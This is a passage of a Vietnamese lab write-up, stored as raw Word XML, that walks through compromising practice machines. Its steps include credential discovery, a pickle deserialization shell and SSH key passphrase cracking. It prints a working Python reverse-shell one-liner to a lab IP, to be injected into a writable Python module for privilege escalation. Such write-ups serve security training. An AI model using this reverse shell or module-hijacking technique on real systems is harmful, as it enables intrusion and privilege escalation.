            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2254AA" w14:textId="659BDB09" w:rsidR="005468B8" w:rsidRDefault="00945677" w:rsidP="007144FF">
      <w:r>
        <w:t>Sau một khoảng thời gian tìm kiếm, thông tin đăng nhập của user anna được lưu tại file database.php trong đường dẫn /fuel/</w:t>
      </w:r>
      <w:r w:rsidR="00536F76">
        <w:t>application/config/: {</w:t>
      </w:r>
      <w:r w:rsidR="00536F76" w:rsidRPr="00A97222">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>anna:H993hfkNNid5kk</w:t>
      </w:r>
      <w:r w:rsidR="00536F76">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272EDBA9" w14:textId="3CD4C001" w:rsidR="00837EB7" w:rsidRDefault="00837EB7" w:rsidP="007144FF">
      <w:r>
        <w:t xml:space="preserve">Sử dụng thông tin đăng nhập lấy được truy cập vào user anna và ta kiếm được flag đầu tiên: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D6B03E" w14:textId="314AA87A" w:rsidR="000605E1" w:rsidRDefault="000605E1" w:rsidP="007144FF">
      <w:r w:rsidRPr="000605E1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BC03D01" wp14:editId="50B33F57">
            <wp:extent cx="5731510" cy="16548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54810"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="182E200C" w14:textId="51BBC63B" w:rsidR="0000762E" w:rsidRDefault="0000762E" w:rsidP="007144FF">
      <w:r>
        <w:t>Để leo thang lên user root, có một số phương thức như cấu hình sai</w:t>
      </w:r>
      <w:r w:rsidR="00A97222">
        <w:t xml:space="preserve"> quyền</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sudo, khai thác SUID</w:t>
      </w:r>
      <w:r w:rsidR="00952E46">
        <w:t xml:space="preserve"> bit,</w:t>
      </w:r>
      <w:r w:rsidR="002A594B">
        <w:t xml:space="preserve"> lỗ hổng kernel,… nhưng trong trường hợp này, có một ứng dụng trong user anna có một lỗ hổng khiến ta có thể leo thang. Ứng dụng này trong thư mục web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649B2675" w14:textId="0BD81FF4" w:rsidR="0009506E" w:rsidRDefault="0009506E" w:rsidP="0009506E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0009506E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D4E92F4" wp14:editId="4A688723">
            <wp:extent cx="3825572" cy="76968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5572" cy="769687"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A2FFF8" w14:textId="60A7EE30" w:rsidR="002A594B" w:rsidRDefault="0009506E" w:rsidP="007144FF">
      <w:r>
        <w:t>Ứng dụng này là một ứng dụng web sử dụng framework là Flask:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2569A0E6" w14:textId="7C6C6E8C" w:rsidR="0009506E" w:rsidRDefault="0009506E" w:rsidP="0009506E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0009506E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E4AC8C3" wp14:editId="0604ACF9">
            <wp:extent cx="4686706" cy="2629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706" cy="2629128"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74149FB4" w14:textId="77777777" w:rsidR="00BD3BFF" w:rsidRDefault="0009506E" w:rsidP="0009506E">
      <w:r>
        <w:t xml:space="preserve">Theo như source code, ứng dụng có một đường dẫn tới /heaven </w:t>
      </w:r>
      <w:r w:rsidR="00DB5FF8">
        <w:t xml:space="preserve">sử dụng phương thức POST với param được truyền vào là awesome. Giá trị param này sau khi được truyền vào sẽ được decode từ base64 và được load bằng </w:t>
      </w:r>
      <w:r w:rsidR="00075707">
        <w:t>module (1 module tuần tự hoá</w:t>
      </w:r>
      <w:r w:rsidR="00D9150E">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00D9150E" w:rsidRPr="00D9150E">
        <w:t>Tuần tự hóa là quá trình chuyển đổi một đối tượng thành luồng byte, trong khi giải tuần tự hóa là quá trình chuyển đổi luồng byte trở lại thành đối tượng</w:t>
      </w:r>
      <w:r w:rsidR="00075707">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="000C67C6">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D9E37F" w14:textId="563FB2DA" w:rsidR="0009506E" w:rsidRDefault="000C67C6" w:rsidP="0009506E">
      <w:r>
        <w:t>Module pickle</w:t>
      </w:r>
      <w:r w:rsidRPr="000C67C6">
        <w:t xml:space="preserve"> hoạt động bằng cách sử dụng định dạng nhị phân để biểu thị các đối tượng Python được tuần tự hóa. Định dạng này có thể được lưu trữ trong một tệp, được truyền qua mạng hoặc được sử dụng để duy trì trạng thái của một đối tượng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BD35C7" w14:textId="04E597DD" w:rsidR="00BD3BFF" w:rsidRDefault="00B63DE5" w:rsidP="00B63DE5">
      <w:r>
        <w:t>Hàm pickle.loads() nhận một đối số duy nhất, là một luồng byte đại diện cho đối tượng được tuần tự hóa. Hàm trả về đối tượng được giải tuần tự hóa</w:t>
      </w:r>
      <w:r w:rsidR="00BD3BFF" w:rsidRPr="00BD3BFF">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BD3BFF">
        <w:t xml:space="preserve"> Khi đối tượng này chưa được </w:t>
      </w:r>
      <w:r w:rsidR="009C7344">
        <w:t>kiểm tra kỹ, hacker có thể tuần tự hoá một đoạn mã độc, và khi được giải tuần tự hoá nó sẽ được thực thi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FFBD65" w14:textId="420E322A" w:rsidR="00B467F3" w:rsidRDefault="00B467F3" w:rsidP="00B63DE5">
      <w:r>
        <w:t>Ta sẽ tạo một file pickle_rce.py với nội dung như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F4FB38" w14:textId="35A75C5C" w:rsidR="00C53159" w:rsidRDefault="00157B7A" w:rsidP="00B63DE5">
      <w:r w:rsidRPr="00157B7A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BC194F8" wp14:editId="78EE87E4">
            <wp:extent cx="5731510" cy="27692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69235"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="708F0CDC" w14:textId="223FBA4F" w:rsidR="00B467F3" w:rsidRDefault="0015152F" w:rsidP="00B63DE5">
      <w:r w:rsidRPr="0015152F">
        <w:t xml:space="preserve">PickleRCE </w:t>
      </w:r>
      <w:r>
        <w:t>định</w:t>
      </w:r>
      <w:r w:rsidRPr="0015152F">
        <w:t xml:space="preserve"> nghĩa một lớp ghi đè phương thức reduce(). Phương thức này được gọi bởi thư viện Pickle khi nó tuần tự hóa một thể hiện của lớp này. Phương thức này trả về một bộ chỉ định hàm được gọi và các đối số của nó. Trong trường hợp này, nó trả về hàm os.system() với đối số </w:t>
      </w:r>
      <w:r>
        <w:t>‘command’</w:t>
      </w:r>
      <w:r w:rsidRPr="0015152F">
        <w:t>. Điều này có nghĩa là khi một</w:t>
      </w:r>
      <w:r w:rsidR="008E487F">
        <w:t xml:space="preserve"> phương thức</w:t>
      </w:r>
      <w:r w:rsidRPr="0015152F">
        <w:t xml:space="preserve"> thể hiện của lớp này được chọn và sau đó được bỏ chọn, hàm os.system() sẽ được gọi với đối số </w:t>
      </w:r>
      <w:r w:rsidR="008E487F">
        <w:t>‘command’</w:t>
      </w:r>
      <w:r w:rsidRPr="0015152F">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00510BAF">
        <w:t xml:space="preserve"> Ở đây ‘command’ là tạo 1 kết nối tới địa chỉ 192.168.56.128 qua cổng 7777 và thiết lập 1 shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4296B671" w14:textId="75275069" w:rsidR="00157B7A" w:rsidRDefault="00157B7A" w:rsidP="00B63DE5">
      <w:r>
        <w:t xml:space="preserve">Khi tạo một cổng 7777 lắng nghe trên máy tấn công, chạy file pickle_rce.py trên máy nạn nhân, ta sẽ nhận được </w:t>
      </w:r>
      <w:r w:rsidR="00592788">
        <w:t>shell user root:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BEC415" w14:textId="03202EB3" w:rsidR="00592788" w:rsidRDefault="00592788" w:rsidP="00B467F3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00592788">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B6CFA87" wp14:editId="7ED3EBF9">
            <wp:extent cx="5212532" cy="208044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2532" cy="2080440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AC3EAE" w14:textId="5839F21E" w:rsidR="00085506" w:rsidRDefault="001C6B21" w:rsidP="00085506">
      <w:r>
        <w:t>Và đương nhiên rồi, flag còn lại sẽ nằm trong folder /root:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420A3E3E" w14:textId="33C4D6AF" w:rsidR="001C6B21" w:rsidRDefault="00327FBF" w:rsidP="00327FBF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00327FBF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B5ADA25" wp14:editId="576F8B24">
            <wp:extent cx="3657917" cy="218713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917" cy="2187130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="216CBC36" w14:textId="637D25C7" w:rsidR="00B258B0" w:rsidRDefault="00B258B0" w:rsidP="00B258B0"/>
    <w:p w14:paraId="531F2C0B" w14:textId="3E1798F6" w:rsidR="00B258B0" w:rsidRDefault="00B258B0" w:rsidP="00DA54FE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lab: </w:t>
      </w:r>
      <w:r w:rsidR="00DA54FE">
        <w:t>Empire_Lupinone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A53F56D" w14:textId="7371A0EA" w:rsidR="00DA54FE" w:rsidRDefault="00DA54FE" w:rsidP="00DA54FE">
      <w:r>
        <w:t>Ip machine: 192.168.56.142</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69372AFD" w14:textId="33CB3E2E" w:rsidR="00DA54FE" w:rsidRDefault="00906AF2" w:rsidP="00DA54FE">
      <w:r>
        <w:t>Dùng nmap quét tổng quan, ta nhận được 2 cổng TCP mở:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171D2D40" w14:textId="26E7C829" w:rsidR="00906AF2" w:rsidRDefault="00906AF2" w:rsidP="00DA54FE">
      <w:r w:rsidRPr="00906AF2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7873ADF9" wp14:editId="08E61DAD">
            <wp:extent cx="4595258" cy="25224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5258" cy="2522439"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7358E56A" w14:textId="19301A46" w:rsidR="0042551C" w:rsidRDefault="0042551C" w:rsidP="00DA54FE">
      <w:r>
        <w:t>Sử dụng</w:t>
      </w:r>
      <w:r w:rsidR="001544F1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001544F1" w:rsidRPr="00522F55">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Suite pro </w:t>
      </w:r>
      <w:r w:rsidR="001544F1">
        <w:t xml:space="preserve">quét </w:t>
      </w:r>
      <w:r w:rsidR="004E1D90">
        <w:t xml:space="preserve">trang web, </w:t>
      </w:r>
      <w:r w:rsidR="002160A2">
        <w:t xml:space="preserve">ta tìm được 1 thư mục </w:t>
      </w:r>
      <w:r w:rsidR="0083731E">
        <w:t>là /~myfiles nhưng khi truy cập trên web thì lỗi 404. Trong mã nguồn của trang có dòng chữ “keep trying”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656CBBA1" w14:textId="52189985" w:rsidR="0083731E" w:rsidRDefault="0083731E" w:rsidP="0083731E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0083731E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="463D1546" wp14:editId="3065F299">
            <wp:extent cx="3017782" cy="214902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7782" cy="2149026"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C6572A" w14:textId="0F335D95" w:rsidR="0083731E" w:rsidRDefault="0083731E" w:rsidP="0083731E">
      <w:r>
        <w:t>Có lẽ ta đang đúng hướng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017D39F3" w14:textId="4845A1AB" w:rsidR="002160A2" w:rsidRDefault="0083731E" w:rsidP="00DA54FE">
      <w:r>
        <w:t xml:space="preserve">Sử dụng ffuf tại thư mục hiện tại nhưng kết quả không khả quan, không có thêm thư mục hay </w:t>
      </w:r>
      <w:r w:rsidR="00AE1E70">
        <w:t>file nào.</w:t>
      </w:r>
      <w:r w:rsidR="00C67E9D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32580306" w14:textId="58B4E5DE" w:rsidR="001D3F68" w:rsidRDefault="001D3F68" w:rsidP="00DA54FE">
      <w:r>
        <w:t xml:space="preserve">Dấu ‘~’ trước myfiles trông khá lạ, có lẽ nó sẽ được dùng trước tên các folder. </w:t>
      </w:r>
      <w:r w:rsidR="00603C59">
        <w:t>Thử lại với ffuf và thêm dấu ‘~’ vào trước, ta nhận được 1 kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE3497F" w14:textId="32BD76AE" w:rsidR="00603C59" w:rsidRDefault="00603C59" w:rsidP="00DA54FE">
      <w:r w:rsidRPr="00603C59">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="297EBB9E" wp14:editId="4F3FE12B">
            <wp:extent cx="5731510" cy="25952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95245"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DB335A" w14:textId="73F028B6" w:rsidR="00CC767F" w:rsidRDefault="00CC767F" w:rsidP="00DA54FE">
      <w:r>
        <w:t>Thông qua trang web, ta biết có một file ssh được giấu tại đây:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F56C015" w14:textId="7691A2D2" w:rsidR="00CC767F" w:rsidRDefault="00CC767F" w:rsidP="00DA54FE">
      <w:r w:rsidRPr="00CC767F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="029A3DF0" wp14:editId="2383138C">
            <wp:extent cx="5731510" cy="12579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57935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C203EA3" w14:textId="2B16C2F9" w:rsidR="00CC767F" w:rsidRDefault="00CC767F" w:rsidP="00DA54FE">
      <w:r w:rsidRPr="00CC767F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>icex64</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> có thể là một thông tin hữu dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23429769" w14:textId="0445A08E" w:rsidR="00172D4D" w:rsidRDefault="00172D4D" w:rsidP="00DA54FE">
      <w:r>
        <w:t>Sử dụng ffuf để tìm các file nhưng không có gì</w:t>
      </w:r>
      <w:r w:rsidR="000F6DF0">
        <w:t xml:space="preserve">, liệu có thực sự ẩn. Qua nmap ta đã biết được webserver được dựng trên Debian, mà trong Debian </w:t>
      </w:r>
      <w:r w:rsidR="004301FA">
        <w:t>các file, folder được ẩn đi bằng cách thêm dấu ‘.’ vào đằng trước tên file hoặc folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2D22A0" w14:textId="33116FA6" w:rsidR="004301FA" w:rsidRDefault="004301FA" w:rsidP="00DA54FE">
      <w:r>
        <w:t>Ta quét lại và tìm thấy file .mysecret.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF50175" w14:textId="64BC184A" w:rsidR="00C67E9D" w:rsidRDefault="00C67E9D" w:rsidP="00DA54FE">
      <w:r w:rsidRPr="00C67E9D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="284D9135" wp14:editId="5ABC7531">
            <wp:extent cx="5731510" cy="4895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89585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFCB670" w14:textId="23EF4CF5" w:rsidR="00207597" w:rsidRDefault="00207597" w:rsidP="00DA54FE">
      <w:r>
        <w:t>Nội dung file có vẻ là đã được mã hoá bằng thuật toán nào đó:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E681731" w14:textId="129B3966" w:rsidR="00207597" w:rsidRDefault="00207597" w:rsidP="00DA54FE">
      <w:r w:rsidRPr="00207597">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26A2229E" wp14:editId="3930723C">
            <wp:extent cx="5731510" cy="15817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81785"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F5AA1C" w14:textId="6DDC7E72" w:rsidR="00207597" w:rsidRDefault="00207597" w:rsidP="00DA54FE">
      <w:r>
        <w:t xml:space="preserve">Copy nội dung, dán vào cyberchef với </w:t>
      </w:r>
      <w:r w:rsidR="004D234C">
        <w:t>method Magic, ta tìm ra được nó được mã hoá từ Base58</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E11189F" w14:textId="79382EDB" w:rsidR="00C67E9D" w:rsidRDefault="00207597" w:rsidP="00DA54FE">
      <w:r w:rsidRPr="00207597">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B6A6DFB" wp14:editId="6A3DED0E">
            <wp:extent cx="5731510" cy="27146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14625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0E6F8D" w14:textId="40711D30" w:rsidR="00172D4D" w:rsidRDefault="00B671E5" w:rsidP="00DA54FE">
      <w:r>
        <w:t>Nhận được privte key, ta sẽ sử dụng nó để đăng nhập vào ssh, lưu dưới dạng id_rsa</w:t>
      </w:r>
      <w:r w:rsidR="004E46AD">
        <w:t xml:space="preserve">. Và user có thể là </w:t>
      </w:r>
      <w:r w:rsidR="004E46AD" w:rsidRPr="00CC767F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>icex64</w:t>
      </w:r>
      <w:r w:rsidR="004E46AD">
        <w:t xml:space="preserve"> mà ta đã tìm được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7980F2" w14:textId="5FB7790E" w:rsidR="004E46AD" w:rsidRDefault="000117B6" w:rsidP="00DA54FE">
      <w:r>
        <w:t>Tuy nhiên, khi login, id_rsa vẫn bị khoá bởi 1 mật khẩu, cái mà đã được nhắc đến trong /~secret: từ điển tên fasttrack. Tra google, ta tìm được 1 bản, tải về, sử dụng john để crack</w:t>
      </w:r>
      <w:r w:rsidR="00180C4F">
        <w:t xml:space="preserve"> và tìm được mật khẩu là: </w:t>
      </w:r>
      <w:r w:rsidR="00180C4F" w:rsidRPr="00180C4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>P@55w0rd!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F96A5E8" w14:textId="069FB715" w:rsidR="00180C4F" w:rsidRDefault="00180C4F" w:rsidP="00DA54FE">
      <w:r w:rsidRPr="00180C4F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3558A9D7" wp14:editId="7BABBDDD">
            <wp:extent cx="5731510" cy="12604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60475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="383F5468" w14:textId="056A9125" w:rsidR="00180C4F" w:rsidRDefault="00180C4F" w:rsidP="00DA54FE">
      <w:r w:rsidRPr="00180C4F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30577BDC" wp14:editId="229D3E45">
            <wp:extent cx="5731510" cy="50863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08635"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="644EF522" w14:textId="2D1212D5" w:rsidR="00180C4F" w:rsidRDefault="00180C4F" w:rsidP="00DA54FE">
      <w:r w:rsidRPr="00180C4F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="366EE413" wp14:editId="139DF022">
            <wp:extent cx="5731510" cy="16097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609725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29693DFC" w14:textId="4882869C" w:rsidR="00180C4F" w:rsidRDefault="00B13418" w:rsidP="00DA54FE">
      <w:r>
        <w:t xml:space="preserve">Flag đầu tiên tìm được tại file user.txt: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A18971" w14:textId="22B27D09" w:rsidR="00B13418" w:rsidRDefault="00B13418" w:rsidP="00DA54FE">
      <w:r w:rsidRPr="00B13418">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DB1CB66" wp14:editId="5AB8A14B">
            <wp:extent cx="5731510" cy="54895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489575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34737C91" w14:textId="4FF5A879" w:rsidR="00B13418" w:rsidRDefault="00A97222" w:rsidP="00DA54FE">
      <w:r>
        <w:t>Theo các method leo thang linux, thì trong trường hợp này, server chứa lỗi về cấu hình sai quyền sudo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4D0572" w14:textId="30FD0065" w:rsidR="00A97222" w:rsidRDefault="00A97222" w:rsidP="00DA54FE">
      <w:r>
        <w:t xml:space="preserve">Sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="003A2454">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>sudo -l</w:t>
      </w:r>
      <w:r w:rsidR="00522F55">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00522F55">
        <w:t xml:space="preserve">ta thấy </w:t>
      </w:r>
      <w:r w:rsidR="0000013B">
        <w:t>user icex64 có quyền thực th</w:t>
      </w:r>
      <w:r w:rsidR="00767A77">
        <w:t xml:space="preserve">i </w:t>
      </w:r>
      <w:r w:rsidR="00FF68A6">
        <w:t xml:space="preserve">python3.9 với </w:t>
      </w:r>
      <w:r w:rsidR="00DC1B20">
        <w:t>file heist.py của user arsene.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1FC10B" w14:textId="7504F2A3" w:rsidR="0000013B" w:rsidRDefault="0000013B" w:rsidP="00DA54FE">
      <w:r w:rsidRPr="0000013B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="641BADD3" wp14:editId="18FEB6F4">
            <wp:extent cx="5731510" cy="84899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848995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="584D17E3" w14:textId="209A5554" w:rsidR="000B356F" w:rsidRDefault="00632431" w:rsidP="00DA54FE">
      <w:r>
        <w:t xml:space="preserve">Sau khi tìm kiếm một số cách leo thang với </w:t>
      </w:r>
      <w:r w:rsidR="009D62C8">
        <w:t xml:space="preserve">python3.9, cộng thêm việc </w:t>
      </w:r>
      <w:r w:rsidR="00B261AD">
        <w:t>ứng dụng heist.py của user arsene sử dụng một module của python tên là webbrowser.py</w:t>
      </w:r>
      <w:r w:rsidR="002D630D">
        <w:t xml:space="preserve"> có quyền write, ta sẽ thêm một reverseshell</w:t>
      </w:r>
      <w:r w:rsidR="000B356F">
        <w:t xml:space="preserve"> như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC846A3" w14:textId="1B061D62" w:rsidR="000B356F" w:rsidRPr="000B356F" w:rsidRDefault="000B356F" w:rsidP="00DA54FE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B356F">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.128",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DD5026" w14:textId="58B9505E" w:rsidR="00DC1B20" w:rsidRDefault="002D630D" w:rsidP="00DA54FE">
      <w:r>
        <w:t xml:space="preserve"> vào trong file này, nó sẽ thực thi khi được gọi:</w:t>
